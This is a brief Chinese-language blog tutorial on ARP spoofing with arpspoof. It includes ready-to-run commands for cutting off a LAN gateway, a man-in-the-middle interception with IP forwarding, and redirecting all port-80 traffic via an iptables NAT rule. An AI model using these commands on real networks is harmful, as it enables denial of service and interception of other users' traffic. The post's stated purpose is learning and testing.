Arp 攻击
Arp 攻击
本篇内容仅用于学习和测试,本人遵纪守法。
安装
arpspoof 是 dsniff 包里的一个程序,可用于arp攻击。Manjaro 中执行以下命令安装这个软件包就可以使用了。
1 | yay -S dsniff |
介绍
arpspoof - 截获交换局域网中的数据包。
1 | 用法 |
使用情景
- 断网攻击,不开启流量转发,使用我的无线网卡
wlp8s0
,攻击网关
1 | sudo arpspoof -i wlp8s0 -t 192.168.1.1 |
- 中间人攻击,截获用户和网关之间的流量
开启流量转发
1 | echo 1 >> /proc/sys/net/ipv4/ip_forward |
欺骗双方,充当中间人
1 | sudo arpspoof -i wlp8s0 -t 192.168.1.1 192.168.1.106 |
此时网关以为我是106,而106以为我是网关。双方的流量都将经过这里,使用 WireShark 即可对经过网卡的流量进行分析。
- 重定向攻击
使局域网所有设备访问的 80 端口,重定向到我这里的 8080 端口,需要开启流量转发。
1 | sudo arpspoof -i wlp8s0 192.168.1.1 |
1 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Vercen'blog!
评论